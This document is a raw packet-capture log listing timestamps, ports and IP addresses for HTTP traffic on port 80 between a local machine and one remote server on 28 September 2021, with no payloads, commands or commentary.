Sep 28, 2021 07:14:08.804980040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805005074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805027008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805028915 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805073977 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805603027 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805632114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805675030 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805706978 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805723906 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805728912 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805754900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805767059 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805788040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805795908 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805911064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805949926 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.805958986 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.805998087 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806026936 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806047916 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.806049109 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806070089 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806093931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806096077 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.806118011 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806138992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806144953 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.806160927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806179047 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.806181908 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.806246996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.813298941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.813339949 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.813461065 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.816315889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.816353083 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.816454887 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.824187040 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.824219942 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.824340105 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.825998068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826033115 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826050997 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826071024 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826088905 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826112032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.826193094 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.826235056 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.837779045 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837830067 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837853909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837874889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837893963 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837913990 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837934017 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837951899 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837963104 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.837973118 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.837996960 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838028908 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838028908 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838064909 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838078976 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838121891 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838160992 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838166952 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838196039 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838196993 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838218927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838238001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838258028 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838258028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838279009 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838298082 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838306904 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838319063 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838337898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838351011 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838361025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838376999 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838382959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838402987 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838422060 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838423014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838443041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838463068 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838474989 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838481903 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838501930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838510036 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838526964 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838546991 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838547945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838567019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838587046 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.838615894 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.838645935 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.840483904 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840512037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840532064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840559959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840585947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840615988 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840640068 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.840645075 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840677977 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840679884 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.840708017 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840728998 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840742111 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.840749025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840769053 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.840771914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.840820074 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.841622114 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841651917 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841681004 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841701984 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841739893 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.841769934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841774940 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.841794014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841821909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841842890 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841844082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.841892958 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.841929913 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841950893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841973066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.841993093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842001915 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.842021942 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.842048883 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842081070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842101097 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842123032 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842128992 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.842144012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842168093 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.842191935 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.842241049 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.848862886 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.848902941 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.849045992 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.851834059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.851866961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.852205038 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.860726118 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.860783100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.860964060 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.862615108 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862670898 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862701893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862724066 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862746000 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862776995 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.862859011 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.862895012 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.881320953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881381989 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881407022 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881474972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881550074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881558895 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.881597042 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881624937 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.881710052 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881752014 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881814957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881856918 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881859064 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.881903887 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881925106 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881977081 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.881998062 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882034063 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882076979 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882092953 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882107019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882122040 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882133961 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882162094 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882179976 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882199049 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882257938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882299900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882322073 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882347107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882369041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882391930 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882405043 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882415056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882436037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882446051 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882457972 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882478952 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882498026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882498980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882524967 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882529020 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882550001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882559061 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882574081 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882596970 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882616043 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882620096 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882642031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882664919 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882685900 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882713079 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882741928 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882765055 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882791042 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882813931 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882833004 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882836103 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882857084 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882879019 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882882118 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882900953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882901907 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882922888 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882944107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882951975 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882970095 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.882989883 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.882992029 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883012056 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883033037 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883052111 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883054018 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883075953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883080006 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883096933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883127928 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883138895 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883162975 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883188963 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883207083 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883213043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883234024 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883246899 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883255959 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883275032 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.883277893 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.883327961 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.884501934 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.884530067 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.884625912 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.887759924 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.887793064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.887907028 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.897136927 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.897542953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898755074 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898803949 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898828983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898853064 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898859024 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.898874044 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898896933 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.898906946 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.898931026 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919260025 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919296980 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919348001 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919409990 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919430971 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919441938 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919471025 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919496059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919522047 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919544935 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919548035 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919579983 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919589996 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919657946 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919702053 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919704914 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919771910 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919814110 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919820070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919898033 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919939041 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.919986963 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.919990063 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920042038 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920072079 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920128107 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920192957 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920218945 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920239925 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920268059 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920273066 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920300007 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920332909 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920350075 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920358896 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920413017 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920428038 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920449018 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920470953 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920492887 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920509100 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920528889 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920552015 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920556068 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920572996 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920594931 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920613050 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920634031 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920649052 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920655012 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920676947 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920700073 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920717001 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920722008 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920742989 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920763016 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920777082 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920783043 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920803070 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920823097 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920839071 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920842886 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920865059 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920866966 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920888901 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920908928 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920923948 CEST	49751	80	192.168.2.4	185.138.164.150
Sep 28, 2021 07:14:08.920928955 CEST	80	49751	185.138.164.150	192.168.2.4
Sep 28, 2021 07:14:08.920948982 CEST	80	49751	185.138.164.150	192.168.2.4
